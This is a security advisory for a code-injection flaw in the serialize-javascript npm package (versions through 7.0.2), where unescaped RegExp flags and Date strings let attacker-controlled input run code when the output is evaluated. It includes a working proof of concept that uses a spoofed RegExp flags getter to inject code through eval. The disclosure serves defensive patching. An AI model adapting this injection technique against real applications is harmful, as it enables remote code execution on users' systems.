GHSA-5c6j-r48x-rmvq: Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()
The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.
While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().
If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.
javascript
const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!
References
- github.com/advisories/GHSA-5c6j-r48x-rmvq
- github.com/advisories/GHSA-hxcc-f52p-wc94
- github.com/yahoo/serialize-javascript
- github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9
- github.com/yahoo/serialize-javascript/releases/tag/v7.0.3
- github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq
- nvd.nist.gov/vuln/detail/CVE-2020-7660
Code Behaviors & Features
Detect and mitigate GHSA-5c6j-r48x-rmvq with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →